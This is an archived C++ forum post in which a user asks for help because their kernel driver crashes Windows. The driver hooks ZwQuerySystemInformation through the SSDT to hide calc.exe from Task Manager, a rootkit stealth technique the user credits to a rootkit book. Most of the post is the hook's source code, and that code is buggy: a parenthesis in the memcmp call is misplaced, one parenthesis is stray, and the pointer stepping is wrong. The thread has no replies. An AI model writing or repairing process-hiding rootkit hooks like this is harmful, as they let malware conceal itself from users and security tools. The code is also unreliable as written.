C++

Forum

 
Got blue page as ZwQuerySystemInformation hooked (SSDT Hooking)

Pouyaaa (16)
Hi guys

I've written a program which was described at Rootkit: Subverting ...... to hide a process like calc.exe but whenever I try to open task manager to see whether it's been hidden or not , I get BluePage....

(I'm not gonna add the piece of codes which is gonna Disable wp and .... ;) )

Here is my source :)


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
 
struct _SYSTEM_THREADS   
{   
        LARGE_INTEGER           KernelTime;   
        LARGE_INTEGER           UserTime;   
        LARGE_INTEGER           CreateTime;   
        ULONG                           WaitTime;   
        PVOID                           StartAddress;   
        CLIENT_ID                       ClientIs;   
        KPRIORITY                       Priority;   
        KPRIORITY                       BasePriority;   
        ULONG                           ContextSwitchCount;   
        ULONG                           ThreadState;   
        KWAIT_REASON            WaitReason;   
};   
   
struct _SYSTEM_PROCESSES   
{   
        ULONG                           NextEntryDelta;   
        ULONG                           ThreadCount;   
        ULONG                           Reserved[6];   
        LARGE_INTEGER           CreateTime;   
        LARGE_INTEGER           UserTime;   
        LARGE_INTEGER           KernelTime;   
        UNICODE_STRING          ProcessName;   
        KPRIORITY                       BasePriority;   
        ULONG                           ProcessId;   
        ULONG                           InheritedFromProcessId;   
        ULONG                           HandleCount;   
        ULONG                           Reserved2[2];   
        VM_COUNTERS                     VmCounters;   
        IO_COUNTERS                     IoCounters; //windows 2000 only   
        struct _SYSTEM_THREADS          Threads[1];   
};   
   
struct _SYSTEM_PROCESSOR_TIMES   
{   
        LARGE_INTEGER                   IdleTime;   
        LARGE_INTEGER                   KernelTime;   
        LARGE_INTEGER                   UserTime;   
        LARGE_INTEGER                   DpcTime;   
        LARGE_INTEGER                   InterruptTime;   
        ULONG                           InterruptCount;   
};   
   
extern "C" NTSYSAPI
NTSTATUS
NTAPI ZwQuerySystemInformation(
  IN	   ULONG SystemInformationClass,
  IN	   PVOID SystemInformation,
  IN       ULONG SystemInformationLength,
  OUT      PULONG ReturnLength
);

typedef NTSTATUS (*ZwQuerySystemInformationPtr)(
  IN	   ULONG SystemInformationClass,
  IN	   PVOID SystemInformation,
  IN       ULONG SystemInformationLength,
  OUT      PULONG ReturnLength
);

ZwQuerySystemInformationPtr		ZwQuerySystemInformationOld;
LARGE_INTEGER                   m_UserTime;   
LARGE_INTEGER                   m_KernelTime;   

NTSTATUS NewZwQuerySystemInformation(IN ULONG SystemInformationClass,IN PVOID SystemInformation,IN ULONG SystemInformationLength,OUT PULONG ReturnLength)
{
	NTSTATUS ntStatus;
	ntStatus = ((ZwQuerySystemInformationPtr)(ZwQuerySystemInformationOld))(SystemInformationClass,SystemInformation,SystemInformationLength,ReturnLength);

	if(NT_SUCCESS(ntStatus))
	{
		//File and Directory Listing
		if(SystemInformationClass==5)
		{
			struct _SYSTEM_PROCESSES *cPRS = (struct _SYSTEM_PROCESSES *)SystemInformation;
			struct _SYSTEM_PROCESSES *pPRS = NULL;
			while (cPRS)
			{
				if(cPRS->ProcessName.Buffer != NULL)
				{
					if(memcmp(cPRS->ProcessName.Buffer,L"calc.exe",12 == 0))
					{
						m_UserTime.QuadPart   += cPRS->UserTime.QuadPart;
						m_KernelTime.QuadPart += cPRS->KernelTime.QuadPart;
						if(pPRS)
						{
							if(cPRS->NextEntryDelta)
							{
								pPRS->NextEntryDelta += cPRS->NextEntryDelta;
							} 
							else
							{
								pPRS->NextEntryDelta = 0;
							}
						}
						else
						{
							if(cPRS->NextEntryDelta)
							{
								SystemInformation = (char *)SystemInformation + cPRS->NextEntryDelta);
							}
							else
								SystemInformation = NULL;
						}
					}
				}
				else
				{
					cPRS->UserTime.QuadPart   += m_UserTime.QuadPart;
					cPRS->KernelTime.QuadPart += m_KernelTime.QuadPart;
					m_UserTime.QuadPart		   = m_KernelTime.QuadPart = 0;
				}
				pPRS = cPRS;
				if(cPRS->NextEntryDelta)(cPRS += cPRS->NextEntryDelta);
				else cPRS = NULL;
			}
		}

		else if(SystemInformationClass == 8)
		{
			struct _SYSTEM_PROCESSOR_TIMES *times = (struct _SYSTEM_PROCESSOR_TIMES *)SystemInformation;
			times->IdleTime.QuadPart += m_UserTime.QuadPart + m_KernelTime.QuadPart;
		}
	}
	return ntStatus;
}




I have no idea to do what to solve it... I'm using WinDDK 7.1 and VS2010

Thanks in advance
Last edited on
Topic archived. No new replies allowed.